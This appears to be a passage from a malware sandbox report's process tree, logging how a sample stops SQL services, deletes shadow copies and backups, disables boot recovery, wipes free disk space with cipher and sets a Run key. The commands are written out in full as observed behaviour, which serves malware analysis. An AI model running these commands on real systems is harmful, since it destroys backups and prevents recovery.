    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQLServerADHelper100
    3⤵
    PID:1812
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop MSSQLServerADHelper100
      4⤵
      PID:1916
    - - C:\Windows\system32\net.exe
        
        net stop MSSQLServerADHelper100
        5⤵
        
        PID:2144
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop MSSQLServerADHelper100
        6⤵
        
        PID:2140
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$ISARS
    3⤵
    PID:1692
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop MSSQL$ISARS
      4⤵
      PID:2308
    - - C:\Windows\system32\net.exe
        
        net stop MSSQL$ISARS
        5⤵
        
        PID:1816
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$ISARS
        6⤵
        
        PID:1820
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$MSFW
    3⤵
    PID:940
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop MSSQL$MSFW
      4⤵
      PID:2948
    - - C:\Windows\system32\net.exe
        
        net stop MSSQL$MSFW
        5⤵
        
        PID:1524
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$MSFW
        6⤵
        
        PID:1532
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$ISARS
    3⤵
    PID:1832
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$ISARS
      4⤵
      PID:1228
    - - C:\Windows\system32\net.exe
        
        net stop SQLAgent$ISARS
        5⤵
        
        PID:652
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop SQLAgent$ISARS
        6⤵
        
        PID:2488
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$MSFW
    3⤵
    PID:1632
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$MSFW
      4⤵
      PID:1604
    - - C:\Windows\system32\net.exe
        
        net stop SQLAgent$MSFW
        5⤵
        
        PID:1644
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop SQLAgent$MSFW
        6⤵
        
        PID:888
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLBrowser
    3⤵
    PID:1064
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop SQLBrowser
      4⤵
      PID:1440
    - - C:\Windows\system32\net.exe
        
        net stop SQLBrowser
        5⤵
        
        PID:2180
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop SQLBrowser
        6⤵
        
        PID:2184
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop REportServer$ISARS
    3⤵
    PID:2100
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop REportServer$ISARS
      4⤵
      PID:2268
    - - C:\Windows\system32\net.exe
        
        net stop REportServer$ISARS
        5⤵
        
        PID:1756
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop REportServer$ISARS
        6⤵
        
        PID:2112
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLWriter
    3⤵
    PID:1752
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop SQLWriter
      4⤵
      PID:2040
    - - C:\Windows\system32\net.exe
        
        net stop SQLWriter
        5⤵
        
        PID:2188
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop SQLWriter
        6⤵
        
        PID:676
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet
    3⤵
    PID:2220
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet
      4⤵
      PID:2980
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin.exe Delete Shadows /All /Quiet
        5⤵
        Interacts with shadow copies
        
        PID:2620
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
    3⤵
    PID:872
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
      4⤵
      PID:1708
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:2296
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No
    3⤵
    PID:2016
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No
      4⤵
      PID:1184
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit.exe /set {default} recoverynabled No
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:2024
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive
    3⤵
    PID:1680
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive
      4⤵
      PID:2200
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
    3⤵
    PID:2360
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
      4⤵
      PID:1560
    - - C:\Windows\system32\wbadmin.exe
        
        wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
        5⤵
        
        PID:2036
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
    3⤵
    PID:1944
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet
    3⤵
    PID:1892
- - C:\Windows\system32\cipher.exe
    cipher /w:\\?\F:
    3⤵
    - Enumerates connected drives
    PID:876
- - C:\Windows\system32\cipher.exe
    cipher /w:\\?\A:
    3⤵
    - Enumerates connected drives
    PID:676
- - C:\Windows\system32\cipher.exe
    cipher /w:\\?\C:
    3⤵
    PID:2360
- C:\Users\Admin\AppData\Local\Temp\f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
  \\?\C:\Users\Admin\AppData\Local\Temp\f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe -network
  2⤵
  - Adds Run key to start application
  PID:1988

C:\Windows\system32\taskkill.exe
taskkill -f -im sqlserv.exe
1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2660

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
1⤵
PID:868
- C:\Windows\system32\wbadmin.exe
  wbadmin DELETE SYSTEMSTATEBACKUP
  2⤵
  - Deletes System State backups
  - Drops file in Windows directory
  PID:1592

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet
1⤵
PID:1104
- C:\Windows\system32\wbadmin.exe
  wbadmin delete backup -keepVersion:0 -quiet
  2⤵
  - Deletes system backups
  PID:1196